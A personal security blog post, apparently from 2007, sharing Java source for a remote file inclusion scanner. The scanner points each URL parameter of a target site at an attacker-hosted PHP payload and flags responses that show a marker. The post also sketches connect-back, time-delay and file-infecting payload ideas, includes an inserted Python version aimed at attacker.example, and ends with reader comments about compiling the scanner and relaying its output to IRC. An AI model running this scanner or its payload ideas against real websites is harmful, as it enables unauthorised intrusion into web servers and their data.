Well, it certainly is true, why not? That question never has a correct answer, in my opinion. It is the same question I asked myself yesterday. I was thinking about what to write on my blog (I was bored and thought that blog writing could help); after a while I just gave up (so, lesson learned: only write when you actually have something to write). So today I fired up my browser (for those wondering, this is a personal opinion: I use Opera {FTW!}, IE {nice}, FF {sucks}, depending on what I need) and the first thing I saw was this. Which is funny, since it's just a couple of days ago that I posted about Python and now I see a nice and small Python script to do funky stuff.
So I hadn't even finished reading and I followed the first link I encountered, which is this one. It's a very nice write-up on how to own IIS 5 using "mythical" exploits. So this brought me back to my first question from a day earlier: why not? Since I didn't have an answer for that, here is my never-finished source code to scan for RFI (remote file inclusion). The whole reason I started out coding this scanner was that I'm lazy and I thought: why do it myself if I can automate it? If you want an overview of the things you should and shouldn't automate on a pentest, read this write-up.
Basically, my todo list when I first wanted to code the scanner was as follows:
- loop through the query parameters of the target URL
- set each parameter in turn to the evil URL that hosts the evil PHP
- check the response for the specified keyword
Then, while I was working on it, I had some better ideas to detect RFI which I never got around to implementing:
- create a PHP file which copies an image and renames it to evil.extension, then check whether that file exists; it's more reliable than just checking whether the page returns a certain keyword (renaming .php to .txt would be stupid, it would open the door for every single person out there)
- create a PHP file which connects back, so the scanner only has to know whether there has been a connect-back from the IP it's scanning (only works if the target is allowed to connect out)
- create a PHP file which has a time delay; the scanner would then just request the URL twice, with and without the evil PHP, and measure the time difference
- infect all PHP files with a header that outputs "hi", then call the URL again to clean all PHP files
So who knows, maybe I will one day extend this scanner, or maybe I'll even attempt to rewrite it in Python, including the features I never got around to implementing.
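Since a Python rewrite is mentioned, here is an added example in Python (written for this page, not the author's code) of two of the detection ideas above: the keyword check the Java scanner already does, and the time-delay check from the wish list. The attacker host `attacker.example`, the payload file names, the marker string, and the `victim.example` target with its `page` and `lang` parameters are all assumptions; `fake_target` is a constructed stand-in for a vulnerable page so the logic runs offline, and `http_fetch` is the real transport you would swap in.

```python
import time
import urllib.error
import urllib.request
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumed attacker-side files (hypothetical host and paths, not from the post).
# k.txt would contain:  <?php echo "RFI_MARK_7f3a"; ?>
# s.txt would contain:  <?php sleep(3); ?>
KEYWORD_PAYLOAD = "http://attacker.example/k.txt"
SLEEP_PAYLOAD = "http://attacker.example/s.txt"
KEYWORD = "RFI_MARK_7f3a"
SLEEP_SECONDS = 3.0


def inject_each_param(url, evil):
    """Yield (param_name, mutated_url), replacing one query value at a time.

    Same job as PrepareURL.fillList() in the Java code, but done on the parsed
    query so a value that occurs twice in the URL is not replaced twice.
    """
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, _value) in enumerate(pairs):
        mutated = pairs[:i] + [(name, evil)] + pairs[i + 1:]
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))


def http_fetch(url, timeout=15):
    """Real transport: GET url, return (body, seconds_taken).

    4xx/5xx responses still return their body instead of raising, because a
    vulnerable include() can echo the marker into an error page too.
    """
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", "replace")
    return body, time.monotonic() - start


def keyword_scan(url, fetch):
    """Idea 1 (what the Java scanner implements): marker string in the response."""
    return [name for name, u in inject_each_param(url, KEYWORD_PAYLOAD)
            if KEYWORD in fetch(u)[0]]


def timing_scan(url, fetch, delay=SLEEP_SECONDS, tolerance=0.5):
    """Idea 2 (the planned time-delay check): compare against a baseline.

    The baseline is the untouched URL, so a slow server on its own does not
    produce a hit; only a parameter whose injection adds roughly `delay` does.
    """
    _body, baseline = fetch(url)
    hits = []
    for name, u in inject_each_param(url, SLEEP_PAYLOAD):
        _body, elapsed = fetch(u)
        if elapsed - baseline >= delay - tolerance:
            hits.append(name)
    return hits


def fake_target(url):
    """Constructed stand-in for a page like index.php?page=home&lang=en where
    only `page` reaches include(). Timings are simulated, nothing sleeps."""
    q = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    body, elapsed = "<html>home</html>", 0.2
    if q.get("page") == KEYWORD_PAYLOAD:
        body = KEYWORD + body            # the included file echoed the marker
    elif q.get("page") == SLEEP_PAYLOAD:
        elapsed += SLEEP_SECONDS         # the included file slept
    return body, elapsed


if __name__ == "__main__":
    target = "http://victim.example/index.php?page=home&lang=en"
    print("keyword hits:", keyword_scan(target, fake_target))   # ['page']
    print("timing hits: ", timing_scan(target, fake_target))    # ['page']
    # Against a real host, pass http_fetch instead of fake_target.
```

The timing variant only works because it measures a baseline first and allows a tolerance; without those, a slow or loaded server looks exactly like a hit. It also has the same dependency as the connect-back idea: the target has to be able to fetch the attacker URL in the first place, otherwise neither the marker nor the delay ever shows up.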
RfiScanner.java
/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */
package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 * Requests every URL produced by PrepareURL and reports the ones whose
 * response body contains the search word.
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy _conProxy;
    private boolean _useProxy;
    private String _SEARCH_WORD;
    private String _vUrl, _aUrl;

    /**
     * @param vUrl the victim URL, including its query string
     * @param aUrl the attacker URL that each parameter will be pointed at
     */
    public RfiScanner(String vUrl, String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use) {
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy) {
        this._conProxy = proxy;
    }

    /** The keyword to look for in each response. */
    public void setSearchWord(String word) {
        this._SEARCH_WORD = word;
    }

    public void scan() {
        try {
            if (_SEARCH_WORD == null) {
                throw new IllegalStateException("call setSearchWord() before scan()");
            }
            PrepareURL victimURL = new PrepareURL(_vUrl, _aUrl);
            URLConnection uc = null;
            while (victimURL.hasNext()) {
                URL u = victimURL.next();
                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                System.out.println("SCANNING: " + u.toString());
                BufferedReader r = null;
                try {
                    r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if (c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break; // stop searching this response
                        }
                    }
                } catch (IOException ioe) {
                    // getInputStream() throws on 4xx/5xx responses; treat that
                    // as "not vulnerable" and move on to the next URL
                } finally {
                    if (r != null) {
                        try { r.close(); } catch (IOException ignored) { }
                    }
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }
    }
}
PrepareURL.java
/*
 * PrepareURL.java
 * @author DiabloHorn
 */
package rrfiscanner;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Set;

/**
 * Builds one attack URL per query parameter: each parameter in turn gets its
 * value replaced with the attacker URL while the others are left untouched.
 *
 * @author DiabloHorn
 */
public class PrepareURL {
    private static final int _nextItemInitialize = -1;
    private String _victimURL;
    private String _evilUrl;
    private ArrayList<URL> _attackUrlList;
    private int _nextItem;

    /**
     * @param victimUrl The URL of the site you want to inject stuff into its params
     * @param attackUrl The "stuff"
     * @throws MalformedURLException Wrong URL
     */
    public PrepareURL(String victimUrl, String attackUrl) throws MalformedURLException {
        this._victimURL = victimUrl;
        this._evilUrl = attackUrl;
        _nextItem = _nextItemInitialize;
        fillList();
    }

    /**
     * @return True if there is another element left, false otherwise
     */
    public boolean hasNext() {
        return _nextItem != (_attackUrlList.size() - 1);
    }

    /**
     * @return Get the next url
     */
    public URL next() {
        _nextItem++;
        return _attackUrlList.get(_nextItem);
    }

    /**
     * This resets the class so you can loop again through the URLs
     */
    public void reset() {
        _nextItem = _nextItemInitialize;
    }

    private void fillList() throws MalformedURLException {
        _attackUrlList = new ArrayList<URL>();
        int qmark = _victimURL.indexOf("?");
        if (qmark == -1) {
            return; // no query string, so there is nothing to inject into
        }
        String query = _victimURL.substring(qmark + 1);
        HashMap<String, String> paramPairs = parseQuery(query);
        Set<String> paramNames = paramPairs.keySet();
        Iterator<String> iParamNames = paramNames.iterator();
        String str;
        while (iParamNames.hasNext()) {
            str = iParamNames.next();
            _attackUrlList.add(new URL(_victimURL.replace(str + "=" + paramPairs.get(str), str + "=" + _evilUrl)));
        }
    }

    /**
     * @param query The query to be stripped down to parameters and their values
     * @return A HashMap with paramname:paramvalue
     */
    private HashMap<String, String> parseQuery(String query) {
        // The rest of this method was cut off in the post; the name and the
        // loop body are a reconstruction: split on "&", then on the first "=".
        HashMap<String, String> pairs = new HashMap<String, String>();
        String[] rawPairs = query.split("&");
        for (int i = 0; i < rawPairs.length; i++) {
            int eq = rawPairs[i].indexOf("=");
            if (eq == -1) {
                pairs.put(rawPairs[i], ""); // parameter without a value
            } else {
                pairs.put(rawPairs[i].substring(0, eq), rawPairs[i].substring(eq + 1));
            }
        }
        return pairs;
    }
}
How do you compile it?
Thanks, friend... I was looking for a Java scanner ;) I'll recode it and redirect the output to IRC via the PircBot framework ;)
Would you like to make an affiliation with my forum?
The link is: htpp://attackersc.altervista.org/ or http://attackersc.altervista.org/forums